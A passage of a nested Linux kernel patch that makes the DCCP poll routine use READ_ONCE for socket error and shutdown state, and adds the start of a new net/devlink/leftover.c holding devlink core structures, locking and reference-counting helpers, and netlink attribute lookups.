+@@ -325,20 +329,21 @@ __poll_t dccp_poll(struct file *file, struct socket *sock,
+ 	 */
+ 
+ 	mask = 0;
+-	if (sk->sk_err)
++	if (READ_ONCE(sk->sk_err))
+ 		mask = EPOLLERR;
++	shutdown = READ_ONCE(sk->sk_shutdown);
+ 
+-	if (sk->sk_shutdown == SHUTDOWN_MASK || sk->sk_state == DCCP_CLOSED)
++	if (shutdown == SHUTDOWN_MASK || state == DCCP_CLOSED)
+ 		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
+ 
+ 	/* Connected? */
+-	if ((1 << sk->sk_state) & ~(DCCPF_REQUESTING | DCCPF_RESPOND)) {
++	if ((1 << state) & ~(DCCPF_REQUESTING | DCCPF_RESPOND)) {
+ 		if (atomic_read(&sk->sk_rmem_alloc) > 0)
+ 			mask |= EPOLLIN | EPOLLRDNORM;
+ 
+-		if (!(sk->sk_shutdown & SEND_SHUTDOWN)) {
++		if (!(shutdown & SEND_SHUTDOWN)) {
+ 			if (sk_stream_is_writeable(sk)) {
+ 				mask |= EPOLLOUT | EPOLLWRNORM;
+ 			} else {  /* send SIGIO later */
+@@ -356,7 +361,6 @@ __poll_t dccp_poll(struct file *file, struct socket *sock,
+ 	}
+ 	return mask;
+ }
+-
+ EXPORT_SYMBOL_GPL(dccp_poll);
+ 
+ int dccp_ioctl(struct sock *sk, int cmd, unsigned long arg)
+diff --git a/net/devlink/Makefile b/net/devlink/Makefile
+new file mode 100644
+index 0000000000000..3a60959f71eea
+--- /dev/null
++++ b/net/devlink/Makefile
+@@ -0,0 +1,3 @@
++# SPDX-License-Identifier: GPL-2.0
++
++obj-y := leftover.o
+diff --git a/net/devlink/leftover.c b/net/devlink/leftover.c
+new file mode 100644
+index 0000000000000..63188d6a50fe9
+--- /dev/null
++++ b/net/devlink/leftover.c
+@@ -0,0 +1,12550 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * net/core/devlink.c - Network physical/parent device Netlink interface
++ *
++ * Heavily inspired by net/wireless/
++ * Copyright (c) 2016 Mellanox Technologies. All rights reserved.
++ * Copyright (c) 2016 Jiri Pirko <jiri@mellanox.com>
++ */
++
++#include <linux/etherdevice.h>
++#include <linux/kernel.h>
++#include <linux/module.h>
++#include <linux/types.h>
++#include <linux/slab.h>
++#include <linux/gfp.h>
++#include <linux/device.h>
++#include <linux/list.h>
++#include <linux/netdevice.h>
++#include <linux/spinlock.h>
++#include <linux/refcount.h>
++#include <linux/workqueue.h>
++#include <linux/u64_stats_sync.h>
++#include <linux/timekeeping.h>
++#include <rdma/ib_verbs.h>
++#include <net/netlink.h>
++#include <net/genetlink.h>
++#include <net/rtnetlink.h>
++#include <net/net_namespace.h>
++#include <net/sock.h>
++#include <net/devlink.h>
++#define CREATE_TRACE_POINTS
++#include <trace/events/devlink.h>
++
++#define DEVLINK_RELOAD_STATS_ARRAY_SIZE \
++	(__DEVLINK_RELOAD_LIMIT_MAX * __DEVLINK_RELOAD_ACTION_MAX)
++
++struct devlink_dev_stats {
++	u32 reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
++	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
++};
++
++struct devlink {
++	u32 index;
++	struct list_head port_list;
++	struct list_head rate_list;
++	struct list_head sb_list;
++	struct list_head dpipe_table_list;
++	struct list_head resource_list;
++	struct list_head param_list;
++	struct list_head region_list;
++	struct list_head reporter_list;
++	struct mutex reporters_lock; /* protects reporter_list */
++	struct devlink_dpipe_headers *dpipe_headers;
++	struct list_head trap_list;
++	struct list_head trap_group_list;
++	struct list_head trap_policer_list;
++	struct list_head linecard_list;
++	struct mutex linecards_lock; /* protects linecard_list */
++	const struct devlink_ops *ops;
++	u64 features;
++	struct xarray snapshot_ids;
++	struct devlink_dev_stats stats;
++	struct device *dev;
++	possible_net_t _net;
++	/* Serializes access to devlink instance specific objects such as
++	 * port, sb, dpipe, resource, params, region, traps and more.
++	 */
++	struct mutex lock;
++	struct lock_class_key lock_key;
++	u8 reload_failed:1;
++	refcount_t refcount;
++	struct completion comp;
++	struct rcu_head rcu;
++	char priv[] __aligned(NETDEV_ALIGN);
++};
++
++struct devlink_linecard_ops;
++struct devlink_linecard_type;
++
++struct devlink_linecard {
++	struct list_head list;
++	struct devlink *devlink;
++	unsigned int index;
++	refcount_t refcount;
++	const struct devlink_linecard_ops *ops;
++	void *priv;
++	enum devlink_linecard_state state;
++	struct mutex state_lock; /* Protects state */
++	const char *type;
++	struct devlink_linecard_type *types;
++	unsigned int types_count;
++	struct devlink *nested_devlink;
++};
++
++/**
++ * struct devlink_resource - devlink resource
++ * @name: name of the resource
++ * @id: id, per devlink instance
++ * @size: size of the resource
++ * @size_new: updated size of the resource, reload is needed
++ * @size_valid: valid in case the total size of the resource is valid
++ *              including its children
++ * @parent: parent resource
++ * @size_params: size parameters
++ * @list: parent list
++ * @resource_list: list of child resources
++ * @occ_get: occupancy getter callback
++ * @occ_get_priv: occupancy getter callback priv
++ */
++struct devlink_resource {
++	const char *name;
++	u64 id;
++	u64 size;
++	u64 size_new;
++	bool size_valid;
++	struct devlink_resource *parent;
++	struct devlink_resource_size_params size_params;
++	struct list_head list;
++	struct list_head resource_list;
++	devlink_resource_occ_get_t *occ_get;
++	void *occ_get_priv;
++};
++
++void *devlink_priv(struct devlink *devlink)
++{
++	return &devlink->priv;
++}
++EXPORT_SYMBOL_GPL(devlink_priv);
++
++struct devlink *priv_to_devlink(void *priv)
++{
++	return container_of(priv, struct devlink, priv);
++}
++EXPORT_SYMBOL_GPL(priv_to_devlink);
++
++struct device *devlink_to_dev(const struct devlink *devlink)
++{
++	return devlink->dev;
++}
++EXPORT_SYMBOL_GPL(devlink_to_dev);
++
++static struct devlink_dpipe_field devlink_dpipe_fields_ethernet[] = {
++	{
++		.name = "destination mac",
++		.id = DEVLINK_DPIPE_FIELD_ETHERNET_DST_MAC,
++		.bitwidth = 48,
++	},
++};
++
++struct devlink_dpipe_header devlink_dpipe_header_ethernet = {
++	.name = "ethernet",
++	.id = DEVLINK_DPIPE_HEADER_ETHERNET,
++	.fields = devlink_dpipe_fields_ethernet,
++	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ethernet),
++	.global = true,
++};
++EXPORT_SYMBOL_GPL(devlink_dpipe_header_ethernet);
++
++static struct devlink_dpipe_field devlink_dpipe_fields_ipv4[] = {
++	{
++		.name = "destination ip",
++		.id = DEVLINK_DPIPE_FIELD_IPV4_DST_IP,
++		.bitwidth = 32,
++	},
++};
++
++struct devlink_dpipe_header devlink_dpipe_header_ipv4 = {
++	.name = "ipv4",
++	.id = DEVLINK_DPIPE_HEADER_IPV4,
++	.fields = devlink_dpipe_fields_ipv4,
++	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv4),
++	.global = true,
++};
++EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv4);
++
++static struct devlink_dpipe_field devlink_dpipe_fields_ipv6[] = {
++	{
++		.name = "destination ip",
++		.id = DEVLINK_DPIPE_FIELD_IPV6_DST_IP,
++		.bitwidth = 128,
++	},
++};
++
++struct devlink_dpipe_header devlink_dpipe_header_ipv6 = {
++	.name = "ipv6",
++	.id = DEVLINK_DPIPE_HEADER_IPV6,
++	.fields = devlink_dpipe_fields_ipv6,
++	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv6),
++	.global = true,
++};
++EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv6);
++
++EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwmsg);
++EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwerr);
++EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_trap_report);
++
++static const struct nla_policy devlink_function_nl_policy[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1] = {
++	[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR] = { .type = NLA_BINARY },
++	[DEVLINK_PORT_FN_ATTR_STATE] =
++		NLA_POLICY_RANGE(NLA_U8, DEVLINK_PORT_FN_STATE_INACTIVE,
++				 DEVLINK_PORT_FN_STATE_ACTIVE),
++};
++
++static const struct nla_policy devlink_selftest_nl_policy[DEVLINK_ATTR_SELFTEST_ID_MAX + 1] = {
++	[DEVLINK_ATTR_SELFTEST_ID_FLASH] = { .type = NLA_FLAG },
++};
++
++static DEFINE_XARRAY_FLAGS(devlinks, XA_FLAGS_ALLOC);
++#define DEVLINK_REGISTERED XA_MARK_1
++#define DEVLINK_UNREGISTERING XA_MARK_2
++
++/* devlink instances are open to the access from the user space after
++ * devlink_register() call. Such logical barrier allows us to have certain
++ * expectations related to locking.
++ *
++ * Before *_register() - we are in initialization stage and no parallel
++ * access possible to the devlink instance. All drivers perform that phase
++ * by implicitly holding device_lock.
++ *
++ * After *_register() - users and driver can access devlink instance at
++ * the same time.
++ */
++#define ASSERT_DEVLINK_REGISTERED(d)                                           \
++	WARN_ON_ONCE(!xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
++#define ASSERT_DEVLINK_NOT_REGISTERED(d)                                       \
++	WARN_ON_ONCE(xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
++
++struct net *devlink_net(const struct devlink *devlink)
++{
++	return read_pnet(&devlink->_net);
++}
++EXPORT_SYMBOL_GPL(devlink_net);
++
++static void __devlink_put_rcu(struct rcu_head *head)
++{
++	struct devlink *devlink = container_of(head, struct devlink, rcu);
++
++	complete(&devlink->comp);
++}
++
++void devlink_put(struct devlink *devlink)
++{
++	if (refcount_dec_and_test(&devlink->refcount))
++		/* Make sure unregister operation that may await the completion
++		 * is unblocked only after all users are after the end of
++		 * RCU grace period.
++		 */
++		call_rcu(&devlink->rcu, __devlink_put_rcu);
++}
++
++struct devlink *__must_check devlink_try_get(struct devlink *devlink)
++{
++	if (refcount_inc_not_zero(&devlink->refcount))
++		return devlink;
++	return NULL;
++}
++
++void devl_assert_locked(struct devlink *devlink)
++{
++	lockdep_assert_held(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_assert_locked);
++
++#ifdef CONFIG_LOCKDEP
++/* For use in conjunction with LOCKDEP only e.g. rcu_dereference_protected() */
++bool devl_lock_is_held(struct devlink *devlink)
++{
++	return lockdep_is_held(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_lock_is_held);
++#endif
++
++void devl_lock(struct devlink *devlink)
++{
++	mutex_lock(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_lock);
++
++int devl_trylock(struct devlink *devlink)
++{
++	return mutex_trylock(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_trylock);
++
++void devl_unlock(struct devlink *devlink)
++{
++	mutex_unlock(&devlink->lock);
++}
++EXPORT_SYMBOL_GPL(devl_unlock);
++
++static struct devlink *
++devlinks_xa_find_get(struct net *net, unsigned long *indexp, xa_mark_t filter,
++		     void * (*xa_find_fn)(struct xarray *, unsigned long *,
++					  unsigned long, xa_mark_t))
++{
++	struct devlink *devlink;
++
++	rcu_read_lock();
++retry:
++	devlink = xa_find_fn(&devlinks, indexp, ULONG_MAX, DEVLINK_REGISTERED);
++	if (!devlink)
++		goto unlock;
++
++	/* In case devlink_unregister() was already called and "unregistering"
++	 * mark was set, do not allow to get a devlink reference here.
++	 * This prevents live-lock of devlink_unregister() wait for completion.
++	 */
++	if (xa_get_mark(&devlinks, *indexp, DEVLINK_UNREGISTERING))
++		goto retry;
++
++	/* For a possible retry, the xa_find_after() should be always used */
++	xa_find_fn = xa_find_after;
++	if (!devlink_try_get(devlink))
++		goto retry;
++	if (!net_eq(devlink_net(devlink), net)) {
++		devlink_put(devlink);
++		goto retry;
++	}
++unlock:
++	rcu_read_unlock();
++	return devlink;
++}
++
++static struct devlink *devlinks_xa_find_get_first(struct net *net,
++						  unsigned long *indexp,
++						  xa_mark_t filter)
++{
++	return devlinks_xa_find_get(net, indexp, filter, xa_find);
++}
++
++static struct devlink *devlinks_xa_find_get_next(struct net *net,
++						 unsigned long *indexp,
++						 xa_mark_t filter)
++{
++	return devlinks_xa_find_get(net, indexp, filter, xa_find_after);
++}
++
++/* Iterate over devlink pointers which were possible to get reference to.
++ * devlink_put() needs to be called for each iterated devlink pointer
++ * in loop body in order to release the reference.
++ */
++#define devlinks_xa_for_each_get(net, index, devlink, filter)			\
++	for (index = 0,								\
++	     devlink = devlinks_xa_find_get_first(net, &index, filter);		\
++	     devlink; devlink = devlinks_xa_find_get_next(net, &index, filter))
++
++#define devlinks_xa_for_each_registered_get(net, index, devlink)		\
++	devlinks_xa_for_each_get(net, index, devlink, DEVLINK_REGISTERED)
++
++static struct devlink *devlink_get_from_attrs(struct net *net,
++					      struct nlattr **attrs)
++{
++	struct devlink *devlink;
++	unsigned long index;
++	char *busname;
++	char *devname;
++
++	if (!attrs[DEVLINK_ATTR_BUS_NAME] || !attrs[DEVLINK_ATTR_DEV_NAME])
++		return ERR_PTR(-EINVAL);
++
++	busname = nla_data(attrs[DEVLINK_ATTR_BUS_NAME]);
++	devname = nla_data(attrs[DEVLINK_ATTR_DEV_NAME]);
++
++	devlinks_xa_for_each_registered_get(net, index, devlink) {
++		if (strcmp(devlink->dev->bus->name, busname) == 0 &&
++		    strcmp(dev_name(devlink->dev), devname) == 0)
++			return devlink;
++		devlink_put(devlink);
++	}
++
++	return ERR_PTR(-ENODEV);
++}
++
++#define ASSERT_DEVLINK_PORT_REGISTERED(devlink_port)				\
++	WARN_ON_ONCE(!(devlink_port)->registered)
++#define ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port)			\
++	WARN_ON_ONCE((devlink_port)->registered)
++#define ASSERT_DEVLINK_PORT_INITIALIZED(devlink_port)				\
++	WARN_ON_ONCE(!(devlink_port)->initialized)
++
++static struct devlink_port *devlink_port_get_by_index(struct devlink *devlink,
++						      unsigned int port_index)
++{
++	struct devlink_port *devlink_port;
++
++	list_for_each_entry(devlink_port, &devlink->port_list, list) {
++		if (devlink_port->index == port_index)
++			return devlink_port;
++	}
++	return NULL;
++}
++
++static bool devlink_port_index_exists(struct devlink *devlink,
++				      unsigned int port_index)
++{
++	return devlink_port_get_by_index(devlink, port_index);
++}
++
++static struct devlink_port *devlink_port_get_from_attrs(struct devlink *devlink,
++							struct nlattr **attrs)
++{
++	if (attrs[DEVLINK_ATTR_PORT_INDEX]) {
++		u32 port_index = nla_get_u32(attrs[DEVLINK_ATTR_PORT_INDEX]);
++		struct devlink_port *devlink_port;
++
++		devlink_port = devlink_port_get_by_index(devlink, port_index);
++		if (!devlink_port)
++			return ERR_PTR(-ENODEV);
++		return devlink_port;
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_port *devlink_port_get_from_info(struct devlink *devlink,
++						       struct genl_info *info)
++{
++	return devlink_port_get_from_attrs(devlink, info->attrs);
++}
++
++static inline bool
++devlink_rate_is_leaf(struct devlink_rate *devlink_rate)
++{
++	return devlink_rate->type == DEVLINK_RATE_TYPE_LEAF;
++}
++
++static inline bool
++devlink_rate_is_node(struct devlink_rate *devlink_rate)
++{
++	return devlink_rate->type == DEVLINK_RATE_TYPE_NODE;
++}
++
++static struct devlink_rate *
++devlink_rate_leaf_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	struct devlink_rate *devlink_rate;
++	struct devlink_port *devlink_port;
++
++	devlink_port = devlink_port_get_from_attrs(devlink, info->attrs);
++	if (IS_ERR(devlink_port))
++		return ERR_CAST(devlink_port);
++	devlink_rate = devlink_port->devlink_rate;
++	return devlink_rate ?: ERR_PTR(-ENODEV);
++}
++
++static struct devlink_rate *
++devlink_rate_node_get_by_name(struct devlink *devlink, const char *node_name)
++{
++	static struct devlink_rate *devlink_rate;
++
++	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
++		if (devlink_rate_is_node(devlink_rate) &&
++		    !strcmp(node_name, devlink_rate->name))
++			return devlink_rate;
++	}
++	return ERR_PTR(-ENODEV);
++}
++
++static struct devlink_rate *
++devlink_rate_node_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
++{
++	const char *rate_node_name;
++	size_t len;
++
++	if (!attrs[DEVLINK_ATTR_RATE_NODE_NAME])
++		return ERR_PTR(-EINVAL);
++	rate_node_name = nla_data(attrs[DEVLINK_ATTR_RATE_NODE_NAME]);
++	len = strlen(rate_node_name);
++	/* Name cannot be empty or decimal number */
++	if (!len || strspn(rate_node_name, "0123456789") == len)
++		return ERR_PTR(-EINVAL);
++
++	return devlink_rate_node_get_by_name(devlink, rate_node_name);
++}
++
++static struct devlink_rate *
++devlink_rate_node_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	return devlink_rate_node_get_from_attrs(devlink, info->attrs);
++}
++
++static struct devlink_rate *
++devlink_rate_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	struct nlattr **attrs = info->attrs;
++
++	if (attrs[DEVLINK_ATTR_PORT_INDEX])
++		return devlink_rate_leaf_get_from_info(devlink, info);
++	else if (attrs[DEVLINK_ATTR_RATE_NODE_NAME])
++		return devlink_rate_node_get_from_info(devlink, info);
++	else
++		return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_linecard *
++devlink_linecard_get_by_index(struct devlink *devlink,
++			      unsigned int linecard_index)
++{
++	struct devlink_linecard *devlink_linecard;
++
++	list_for_each_entry(devlink_linecard, &devlink->linecard_list, list) {
++		if (devlink_linecard->index == linecard_index)
++			return devlink_linecard;
++	}
++	return NULL;
++}
++
++static bool devlink_linecard_index_exists(struct devlink *devlink,
++					  unsigned int linecard_index)
++{
++	return devlink_linecard_get_by_index(devlink, linecard_index);
++}
++
++static struct devlink_linecard *
++devlink_linecard_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
++{
++	if (attrs[DEVLINK_ATTR_LINECARD_INDEX]) {
++		u32 linecard_index = nla_get_u32(attrs[DEVLINK_ATTR_LINECARD_INDEX]);
++		struct devlink_linecard *linecard;
++
++		mutex_lock(&devlink->linecards_lock);
++		linecard = devlink_linecard_get_by_index(devlink, linecard_index);
++		if (linecard)
++			refcount_inc(&linecard->refcount);
++		mutex_unlock(&devlink->linecards_lock);
++		if (!linecard)
++			return ERR_PTR(-ENODEV);
++		return linecard;
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_linecard *
++devlink_linecard_get_from_info(struct devlink *devlink, struct genl_info *info)
++{
++	return devlink_linecard_get_from_attrs(devlink, info->attrs);
++}
++
++static void devlink_linecard_put(struct devlink_linecard *linecard)
++{
++	if (refcount_dec_and_test(&linecard->refcount)) {
++		mutex_destroy(&linecard->state_lock);
++		kfree(linecard);
++	}
++}
++
++struct devlink_sb {
++	struct list_head list;
++	unsigned int index;
++	u32 size;
++	u16 ingress_pools_count;
++	u16 egress_pools_count;
++	u16 ingress_tc_count;
++	u16 egress_tc_count;
++};
++
++static u16 devlink_sb_pool_count(struct devlink_sb *devlink_sb)
++{
++	return devlink_sb->ingress_pools_count + devlink_sb->egress_pools_count;
++}
++
++static struct devlink_sb *devlink_sb_get_by_index(struct devlink *devlink,
++						  unsigned int sb_index)
++{
++	struct devlink_sb *devlink_sb;
++
++	list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++		if (devlink_sb->index == sb_index)
++			return devlink_sb;
++	}
++	return NULL;
++}
++
++static bool devlink_sb_index_exists(struct devlink *devlink,
++				    unsigned int sb_index)
++{
++	return devlink_sb_get_by_index(devlink, sb_index);
++}
++
++static struct devlink_sb *devlink_sb_get_from_attrs(struct devlink *devlink,
++						    struct nlattr **attrs)
++{
++	if (attrs[DEVLINK_ATTR_SB_INDEX]) {
++		u32 sb_index = nla_get_u32(attrs[DEVLINK_ATTR_SB_INDEX]);
++		struct devlink_sb *devlink_sb;
++
++		devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
++		if (!devlink_sb)
++			return ERR_PTR(-ENODEV);
++		return devlink_sb;
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static struct devlink_sb *devlink_sb_get_from_info(struct devlink *devlink,
++						   struct genl_info *info)
++{
++	return devlink_sb_get_from_attrs(devlink, info->attrs);
++}
++
++static int devlink_sb_pool_index_get_from_attrs(struct devlink_sb *devlink_sb,
++						struct nlattr **attrs,
++						u16 *p_pool_index)
++{
++	u16 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_POOL_INDEX])
++		return -EINVAL;
++
++	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_POOL_INDEX]);
++	if (val >= devlink_sb_pool_count(devlink_sb))
++		return -EINVAL;
++	*p_pool_index = val;
++	return 0;
++}
++
++static int devlink_sb_pool_index_get_from_info(struct devlink_sb *devlink_sb,
++					       struct genl_info *info,
++					       u16 *p_pool_index)
++{
++	return devlink_sb_pool_index_get_from_attrs(devlink_sb, info->attrs,
++						    p_pool_index);
++}
++
++static int
++devlink_sb_pool_type_get_from_attrs(struct nlattr **attrs,
++				    enum devlink_sb_pool_type *p_pool_type)
++{
++	u8 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_POOL_TYPE])
++		return -EINVAL;
++
++	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_TYPE]);
++	if (val != DEVLINK_SB_POOL_TYPE_INGRESS &&
++	    val != DEVLINK_SB_POOL_TYPE_EGRESS)
++		return -EINVAL;
++	*p_pool_type = val;
++	return 0;
++}
++
++static int
++devlink_sb_pool_type_get_from_info(struct genl_info *info,
++				   enum devlink_sb_pool_type *p_pool_type)
++{
++	return devlink_sb_pool_type_get_from_attrs(info->attrs, p_pool_type);
++}
++
++static int
++devlink_sb_th_type_get_from_attrs(struct nlattr **attrs,
++				  enum devlink_sb_threshold_type *p_th_type)
++{
++	u8 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE])
++		return -EINVAL;
++
++	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE]);
++	if (val != DEVLINK_SB_THRESHOLD_TYPE_STATIC &&
++	    val != DEVLINK_SB_THRESHOLD_TYPE_DYNAMIC)
++		return -EINVAL;
++	*p_th_type = val;
++	return 0;
++}
++
++static int
++devlink_sb_th_type_get_from_info(struct genl_info *info,
++				 enum devlink_sb_threshold_type *p_th_type)
++{
++	return devlink_sb_th_type_get_from_attrs(info->attrs, p_th_type);
++}
++
++static int
++devlink_sb_tc_index_get_from_attrs(struct devlink_sb *devlink_sb,
++				   struct nlattr **attrs,
++				   enum devlink_sb_pool_type pool_type,
++				   u16 *p_tc_index)
++{
++	u16 val;
++
++	if (!attrs[DEVLINK_ATTR_SB_TC_INDEX])
++		return -EINVAL;
++
++	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_TC_INDEX]);
++	if (pool_type == DEVLINK_SB_POOL_TYPE_INGRESS &&
++	    val >= devlink_sb->ingress_tc_count)
++		return -EINVAL;
++	if (pool_type == DEVLINK_SB_POOL_TYPE_EGRESS &&
++	    val >= devlink_sb->egress_tc_count)
++		return -EINVAL;
++	*p_tc_index = val;
++	return 0;
++}
++
++static int
++devlink_sb_tc_index_get_from_info(struct devlink_sb *devlink_sb,
++				  struct genl_info *info,
++				  enum devlink_sb_pool_type pool_type,
++				  u16 *p_tc_index)
++{
++	return devlink_sb_tc_index_get_from_attrs(devlink_sb, info->attrs,
++						  pool_type, p_tc_index);
++}
++
++struct devlink_region {
++	struct devlink *devlink;
++	struct devlink_port *port;
++	struct list_head list;
++	union {
++		const struct devlink_region_ops *ops;
++		const struct devlink_port_region_ops *port_ops;
++	};
++	struct mutex snapshot_lock; /* protects snapshot_list,
++				     * max_snapshots and cur_snapshots
++				     * consistency.
++				     */
++	struct list_head snapshot_list;
++	u32 max_snapshots;
++	u32 cur_snapshots;
++	u64 size;
++};
++
++struct devlink_snapshot {
++	struct list_head list;
++	struct devlink_region *region;
++	u8 *data;
++	u32 id;
++};
++
++static struct devlink_region *
++devlink_region_get_by_name(struct devlink *devlink, const char *region_name)
++{
++	struct devlink_region *region;
++
++	list_for_each_entry(region, &devlink->region_list, list)
++		if (!strcmp(region->ops->name, region_name))
++			return region;
++
++	return NULL;
++}
++
++static struct devlink_region *
++devlink_port_region_get_by_name(struct devlink_port *port,
++				const char *region_name)
++{
++	struct devlink_region *region;
++
++	list_for_each_entry(region, &port->region_list, list)
++		if (!strcmp(region->ops->name, region_name))
++			return region;
++
++	return NULL;
++}
++
++static struct devlink_snapshot *
++devlink_region_snapshot_get_by_id(struct devlink_region *region, u32 id)
++{
++	struct devlink_snapshot *snapshot;
++
++	list_for_each_entry(snapshot, &region->snapshot_list, list)
++		if (snapshot->id == id)
++			return snapshot;
++
++	return NULL;
++}
++
++#define DEVLINK_NL_FLAG_NEED_PORT		BIT(0)
++#define DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT	BIT(1)
++#define DEVLINK_NL_FLAG_NEED_RATE		BIT(2)
++#define DEVLINK_NL_FLAG_NEED_RATE_NODE		BIT(3)
++#define DEVLINK_NL_FLAG_NEED_LINECARD		BIT(4)
++
++static int devlink_nl_pre_doit(const struct genl_ops *ops,
++			       struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink_linecard *linecard;
++	struct devlink_port *devlink_port;
++	struct devlink *devlink;
++	int err;
++
++	devlink = devlink_get_from_attrs(genl_info_net(info), info->attrs);
++	if (IS_ERR(devlink))
++		return PTR_ERR(devlink);
++	devl_lock(devlink);
++	info->user_ptr[0] = devlink;
++	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_PORT) {
++		devlink_port = devlink_port_get_from_info(devlink, info);
++		if (IS_ERR(devlink_port)) {
++			err = PTR_ERR(devlink_port);
++			goto unlock;
++		}
++		info->user_ptr[1] = devlink_port;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_DEVLINK_OR_PORT) {
++		devlink_port = devlink_port_get_from_info(devlink, info);
++		if (!IS_ERR(devlink_port))
++			info->user_ptr[1] = devlink_port;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE) {
++		struct devlink_rate *devlink_rate;
++
++		devlink_rate = devlink_rate_get_from_info(devlink, info);
++		if (IS_ERR(devlink_rate)) {
++			err = PTR_ERR(devlink_rate);
++			goto unlock;
++		}
++		info->user_ptr[1] = devlink_rate;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_RATE_NODE) {
++		struct devlink_rate *rate_node;
++
++		rate_node = devlink_rate_node_get_from_info(devlink, info);
++		if (IS_ERR(rate_node)) {
++			err = PTR_ERR(rate_node);
++			goto unlock;
++		}
++		info->user_ptr[1] = rate_node;
++	} else if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
++		linecard = devlink_linecard_get_from_info(devlink, info);
++		if (IS_ERR(linecard)) {
++			err = PTR_ERR(linecard);
++			goto unlock;
++		}
++		info->user_ptr[1] = linecard;
++	}
++	return 0;
++
++unlock:
++	devl_unlock(devlink);
++	devlink_put(devlink);
++	return err;
++}
++
++static void devlink_nl_post_doit(const struct genl_ops *ops,
++				 struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink_linecard *linecard;
++	struct devlink *devlink;
++
++	devlink = info->user_ptr[0];
++	if (ops->internal_flags & DEVLINK_NL_FLAG_NEED_LINECARD) {
++		linecard = info->user_ptr[1];
++		devlink_linecard_put(linecard);
++	}
++	devl_unlock(devlink);
++	devlink_put(devlink);
++}
++
++static struct genl_family devlink_nl_family;
++
++enum devlink_multicast_groups {
++	DEVLINK_MCGRP_CONFIG,
++};
++
++static const struct genl_multicast_group devlink_nl_mcgrps[] = {
++	[DEVLINK_MCGRP_CONFIG] = { .name = DEVLINK_GENL_MCGRP_CONFIG_NAME },
++};
++
++static int devlink_nl_put_handle(struct sk_buff *msg, struct devlink *devlink)
++{
++	if (nla_put_string(msg, DEVLINK_ATTR_BUS_NAME, devlink->dev->bus->name))
++		return -EMSGSIZE;
++	if (nla_put_string(msg, DEVLINK_ATTR_DEV_NAME, dev_name(devlink->dev)))
++		return -EMSGSIZE;
++	return 0;
++}
++
++static int devlink_nl_put_nested_handle(struct sk_buff *msg, struct devlink *devlink)
++{
++	struct nlattr *nested_attr;
++
++	nested_attr = nla_nest_start(msg, DEVLINK_ATTR_NESTED_DEVLINK);
++	if (!nested_attr)
++		return -EMSGSIZE;
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, nested_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, nested_attr);
++	return -EMSGSIZE;
++}
++
++struct devlink_reload_combination {
++	enum devlink_reload_action action;
++	enum devlink_reload_limit limit;
++};
++
++static const struct devlink_reload_combination devlink_reload_invalid_combinations[] = {
++	{
++		/* can't reinitialize driver with no down time */
++		.action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT,
++		.limit = DEVLINK_RELOAD_LIMIT_NO_RESET,
++	},
++};
++
++static bool
++devlink_reload_combination_is_invalid(enum devlink_reload_action action,
++				      enum devlink_reload_limit limit)
++{
++	int i;
++
++	for (i = 0; i < ARRAY_SIZE(devlink_reload_invalid_combinations); i++)
++		if (devlink_reload_invalid_combinations[i].action == action &&
++		    devlink_reload_invalid_combinations[i].limit == limit)
++			return true;
++	return false;
++}
++
++static bool
++devlink_reload_action_is_supported(struct devlink *devlink, enum devlink_reload_action action)
++{
++	return test_bit(action, &devlink->ops->reload_actions);
++}
++
++static bool
++devlink_reload_limit_is_supported(struct devlink *devlink, enum devlink_reload_limit limit)
++{
++	return test_bit(limit, &devlink->ops->reload_limits);
++}
++
++static int devlink_reload_stat_put(struct sk_buff *msg,
